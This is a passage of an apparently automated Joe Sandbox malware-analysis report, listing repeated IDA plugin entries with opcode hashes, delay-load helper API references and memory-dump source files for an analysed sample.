              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 974222dadc3a2583980458c8af6595c6900905cb0eddd1032b7971d23a696c11
              • Instruction ID: ac8056ae8bdbc4a0f7672b956f7a6419f86ae885e20a05142aeba0dc76d2ed35
              • Opcode Fuzzy Hash: 974222dadc3a2583980458c8af6595c6900905cb0eddd1032b7971d23a696c11
              • Instruction Fuzzy Hash: 3DB012D126C6016C310C624C6D02F76020CFCC2B10330846AB20BE02C0D8506D8F0432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9188a7ed8175204dc42a88300c5b5668c692b6fa21bafcb4c96d9c31e0597cc0
              • Instruction ID: 0952b400c8daee3c38883abc98888866df87100d51fb3273f6f96507f3588413
              • Opcode Fuzzy Hash: 9188a7ed8175204dc42a88300c5b5668c692b6fa21bafcb4c96d9c31e0597cc0
              • Instruction Fuzzy Hash: 13B012E126C601AC310C62486C02F76020CFCC3B10330842AB60FD01C0D8406D8D0432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 7cd93bb28a4dd90d64819c1935701f5e9d32a8affe51bf36f1a1682541453821
              • Instruction ID: 22c003092a7af7df88ae89327d19aab07768b768f50b5e3307a4d1e455a6e2e3
              • Opcode Fuzzy Hash: 7cd93bb28a4dd90d64819c1935701f5e9d32a8affe51bf36f1a1682541453821
              • Instruction Fuzzy Hash: 1DB012E126C701AD314C62486C02F76020CFCC2B50331452AB20FD01C0D8406DC90472
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: de63d0368b2653d03e70a6c4a13e51b61736cd11492522a13f316586fdf2a5c1
              • Instruction ID: 74ae8dfc7e73b820b0d50ac71eb8d9150a680db787f51435f8707a38bfbe4644
              • Opcode Fuzzy Hash: de63d0368b2653d03e70a6c4a13e51b61736cd11492522a13f316586fdf2a5c1
              • Instruction Fuzzy Hash: 41B012E126C601AC310C62486D02F76020CFCC2B10330442AB20FD01C0D8406E8A0432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 60c5ed684b803a648861192102bc5235b8b3d5c3cd183f95ed68ec1ac22c7a9e
              • Instruction ID: c23a5b6b12f07204cce945659daa386034cd7ba191fd15abbf8d1b5ad77a34e4
              • Opcode Fuzzy Hash: 60c5ed684b803a648861192102bc5235b8b3d5c3cd183f95ed68ec1ac22c7a9e
              • Instruction Fuzzy Hash: 03B012E126C601AC310C62496C02F76020CFCC2B10330442AB20FD01C0D8406D890432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 4d11d7102e975c99ddd22d6840cea483ab6e0e64a3999ab0cd73d9d8e1995ad2
              • Instruction ID: a3de8498fac3b5df57201e84dec3e8b06e7d7e64a8b389b7086f6a8a4ec3de64
              • Opcode Fuzzy Hash: 4d11d7102e975c99ddd22d6840cea483ab6e0e64a3999ab0cd73d9d8e1995ad2
              • Instruction Fuzzy Hash: C3B012D126D6016C310C62486C02F76020DFDC3B10730842AB60BD01C0D840AC890432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 7db3c1a29a92961daa65d2246ec32bfbd4ec2e9fd0e5c734e7f701cb932c557d
              • Instruction ID: 2969f43b2187f2403b63774d968c45abba431237a16ef3c16d5458abb6d137c2
              • Opcode Fuzzy Hash: 7db3c1a29a92961daa65d2246ec32bfbd4ec2e9fd0e5c734e7f701cb932c557d
              • Instruction Fuzzy Hash: A3B012E126D7016D314C63486C02F76020DFDC2B50731452AB20BD01C0D840ACC90432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 4630316bccb7b0736e4f98a00ffcd6463c0138c6ff18326cbc49830b3b2feabd
              • Instruction ID: d0929298cf94bc16d53728d1694ca21ad94500d7ed549b87d2ab9eb697514c5a
              • Opcode Fuzzy Hash: 4630316bccb7b0736e4f98a00ffcd6463c0138c6ff18326cbc49830b3b2feabd
              • Instruction Fuzzy Hash: 5BB012D127D6016C310C62486C02F76024DFDC2B10730442AB20BD01C0D840AC890432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 316aca16024dc9d3b9dd9d4dd0cbf2a2159558d602c73d6a2f36bd9cd6032a2c
              • Instruction ID: f9edefd121b8c28b7c6a65ab2ca9c338b419f59e09bbd2911948e5d20999500d
              • Opcode Fuzzy Hash: 316aca16024dc9d3b9dd9d4dd0cbf2a2159558d602c73d6a2f36bd9cd6032a2c
              • Instruction Fuzzy Hash: 8BB012D126D6016C310C62586C03F76024CFCC3B10331842AB70BD01C0E940ACC90432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 517a333e48353d8dee27824a5395940ee6fa2248ea38a7ce51c19abde29e72d5
              • Instruction ID: 77a94bb896bde6c12d0fc5117e81734014446717f143ac36cfce7ffeb38ee7b2
              • Opcode Fuzzy Hash: 517a333e48353d8dee27824a5395940ee6fa2248ea38a7ce51c19abde29e72d5
              • Instruction Fuzzy Hash: B2B012E126D6016C310C62486D03F76028CFCC2B10730442AB20BD01C0E8406DCA0432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 0a7dfe19da7c398f9b27f33b8042e95788959f4d2ee99c8df386fc9fa3dbd9d3
              • Instruction ID: 6194ccbfffe8931a714cb0f9ea64e8ce0b5f509179e867581a4adaf7dd35479c
              • Opcode Fuzzy Hash: 0a7dfe19da7c398f9b27f33b8042e95788959f4d2ee99c8df386fc9fa3dbd9d3
              • Instruction Fuzzy Hash: EAB012E126C601EC3108B1496C12F7B034CFCC0B10330C11BB50AC0184D8484D8D4433
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e25218ddce30edbc492f1e70b7cf5d2e8c5da46db6f21f0ecb79b60c861f80d2
              • Instruction ID: 7cd11a50fa7745dca37a63dffa509cf6c7faf25d11b11fba25820b4ca86d140c
              • Opcode Fuzzy Hash: e25218ddce30edbc492f1e70b7cf5d2e8c5da46db6f21f0ecb79b60c861f80d2
              • Instruction Fuzzy Hash: 30B012D126C6016C3108B14D6D12F7F034CFCC4B14330851BB20AD0144D8444C8E4433
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d115b3688d8f17aee2485f6bfbfbcd317f70198ebc3f558bdefc36ed0a859f72
              • Instruction ID: 817690b90934a43a4ab61881ac34020ce6ea3e535364ecdfa05ee376514917bd
              • Opcode Fuzzy Hash: d115b3688d8f17aee2485f6bfbfbcd317f70198ebc3f558bdefc36ed0a859f72
              • Instruction Fuzzy Hash: 64B012D637C70A7C3208114C2C07EB7021CF8C0B30331452AB207D40409D444CCE4033
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 8420ec24acce84c919cf86eba80826f28811b9cc7e58c10173734654a82a2e94
              • Instruction ID: 15628042178a3c474b92e101b423ecead2c15249bbc4e26bc62447d8b7733cf4
              • Opcode Fuzzy Hash: 8420ec24acce84c919cf86eba80826f28811b9cc7e58c10173734654a82a2e94
              • Instruction Fuzzy Hash: 3AB012D636C6056C3108515C2C07FB6021CF8C0B30331442AB21BC0140DD404C8E4033
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 690313d1c6d4496f5edb2ee792702cca1731d3cd2036f3ef36321ccd006275af
              • Instruction ID: 52102d178302be8f5e4a4061dc16517a24582c32a3a239f6c31417a55234106e
              • Opcode Fuzzy Hash: 690313d1c6d4496f5edb2ee792702cca1731d3cd2036f3ef36321ccd006275af
              • Instruction Fuzzy Hash: 13B012D636C606AC310C514C2C07FB7026CF8C0B30331851AB60BC5180DD444C8E4033
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 30b259e130b571ad513ecdad0856386043a733e2db4589c29d06a99f64a13e58
              • Instruction ID: 9e661c3fa7ef575da0237983851e692b149704903b25beb3c5e341c73108b189
              • Opcode Fuzzy Hash: 30b259e130b571ad513ecdad0856386043a733e2db4589c29d06a99f64a13e58
              • Instruction Fuzzy Hash: 47B012D636C6067C310C514C2D07FB7025CF8C0B30331841AB30BC4140DD444C8B4033
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1dbff822f8eb6d3d4e0857864f6b57c3923fb2446fb609f8751eabef5b8387db
              • Instruction ID: ab1de2d5d3691f473a09ed34586282809bc7e561f55fc72bdf93b2531e59117f
              • Opcode Fuzzy Hash: 1dbff822f8eb6d3d4e0857864f6b57c3923fb2446fb609f8751eabef5b8387db
              • Instruction Fuzzy Hash: DBB012D12AC7056C7108F1496C12F7B034CFCC0B10330411BB10AC0144D8444C894533
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DC36
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
